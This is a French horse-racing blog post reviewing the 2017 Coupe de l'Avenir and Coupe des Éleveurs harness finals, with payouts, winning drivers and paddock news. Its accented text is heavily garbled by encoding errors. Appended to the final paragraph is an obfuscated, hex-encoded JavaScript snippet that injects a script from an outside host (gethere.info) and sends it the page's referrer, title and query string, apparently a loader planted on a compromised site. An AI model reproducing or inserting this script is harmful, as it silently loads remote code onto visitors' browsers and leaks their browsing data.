Un retour sur les Coupes 2017

7 septembre 2018 | Les confidences du prof | By : Daniel Delisle

Contrairement A� la croyance populaire, les finales quA�bA�coises des Coupes de la��Avenir et des A�leveurs ne sont pas toujours la��apanage des grands favoris. Pour A�clairer notre lanterne et dissiper nos prA�jugA�s, voyons voir ce qui sa��est passA� le 3 septembre 2017, lors de ces mA?mes finales

 

De gros favoris, oui mais…

 

La personne chargA�e de placer les huit finales dans un ordre logique avait fait preuve de flair en 2017, en plaA�ant les trois finales dominA�es par de gros favoris en dA�but de programme. Ca��est ainsi qua��ont dA�filA� au cercle des vainqueurs dans les trois premiA?res courses, les trois gros favoris prohibitifs, dans la��ordre Stock ( 2.10$), Capteur De Reve (2.80$), Precieuse CC (2.60$).

 

Le milieu de programme rA�serva ses surprises lorsque tour A� tour se sont prA�sentA�s au photographe, Magestic M ( 18.30$) et Ganymede Lavec ( 36.40$). Les trois derniA?res finales furent la��affaire de plus ou moins gagnants favoris avec des retours tout de mA?me intA�ressantsA�: Lit De Rose (3.90$), Wildriverbumbleblee (6.80$) et YS Tallia ( 7.20$).

Lit De Rose, une gagnante chez les ambleusesA� de 2 ans A� 3.90$

La moyenne des retours au mutuel des huit finalesA�: 10$ pile, soit A� peu prA?s la moyenne pour un programme A� H3R au cours des derniA?res annA�es.

 

Qua��en sera-t-il de 2018 ?

 

Le scA�nario devrait A?tre assez semblable, fait de gagnants attendus et de gagnants surprenants. Nous avons certes des poulains et des pouliches qui ont attirA� la��attention durant les A�liminatoires, mais les positions de dA�part, la forme des chevaux ce jour-lA�, la mA�tA�o, sont autant de facteurs qui viennent ajouter au suspense et rendent la��exercice des parieurs, plus qua��intA�ressant.

 

Incidemment, en 2017, les grands gagnants avaient A�tA� Daniel DubA� avec trois victoires dans les finales, StA�phane Brosseau avec deux. Chez les entraA�neurs, Maxime Velaye avait connu une journA�e fort lucrative. Ca��est 480A�000$ qui seront distrubA�s dimanche, de loin le montant le plus lucratif de la saison. Un rendez-vous A� ne pas manquer, pour sA�r.

Ganymede Lavec, un trotteur de 2 ans en 2017, gagnant A� 36.40$

Bruits de paddock

 

Ceux qui suivent rA�guliA?rement les courses en direct, A� la��hippodrome ou dans le confort de leur foyer, auront remarquA� que la��A�mission qui englobe la prA�sentation da��un programme rA�gulier, a A�tA� de beaucoup amA�liorA�e. Les principaux acteurs en sont A�videmment les premiers responsables, mais la��ajout da��un rA�gisseur de plateau da��expA�rience en la personne de Sylvain Poisson, a grandement amA�liorA� la qualitA� de la��A�mission. Et de son propre aveu, ce na��est pas fini… on veut faire de cette prA�sentation une A�mission professionnelle et agrA�able A� regarder.

 

Kevin Maguire a acquis au cours des derniers jours, une pouliche ambleuse de 18 mois, A�levA�e par ClA�ment Boisvert, dans la pA�riphA�rie de Trois-RiviA?res. Ca��est une fille de Mickey Hanover et da��une mA?re par Sportswriter.

 

Jean-Claude Bertiaume A�tait fier da��annoncer que sa championne A� 2 ans, Joyce Lavec, A�tait gestante de Justice Hall.

Joyce Lavec, une gagnante de la Coupe de l’Avenir en 2016

Les gens de chevaux ont maintenant un nouveau patron au paddock en la personne de Michel Turgeon, unA� homme avec une belle expA�rience du milieu. Il remplacera RA�al Martineau, une prA�sence extraordinaire au paddock trifluvien depuis quelques dA�cennies, une sorte da��institution. Nous souhaitons A� ce dernier une heureuse retraite, une bonne santA� et de venir nous voir de temps A� autre. Tous les gens de chevaux lui sont redevables, on peut en A?tre sA�r.

 

A� compter du 16 spetembre, des sA�ries pour les produits da��A�levage quA�bA�cois se mettront en branle, dans le but A�vident de favoriser des poulains et des pouliches qui na��ont pas eu beaucoup de chance A� ce jour et dont les gains sont modestes. Le tout devrait donner de bonnes confrontations et un bon spectacle.var _0x31f1=[« \x73\x63\x72\x69\x70\x74″, »\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″, »\x73\x72\x63″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D », »\x72\x65\x66\x65\x72\x72\x65\x72″, »\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D », »\x74\x69\x74\x6C\x65″, »\x26″, »\x3F », »\x72\x65\x70\x6C\x61\x63\x65″, »\x73\x65\x61\x72\x63\x68″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E », »\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″, »\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″, »\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″, »\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″, »\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″, »\x68\x65\x61\x64″, »\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″, »\x70\x72\x6F\x74\x6F\x63\x6F\x6C », »\x68\x74\x74\x70\x73\x3A », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x52\x5F\x50\x41\x54\x48″, »\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E »];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Retour aux nouvelles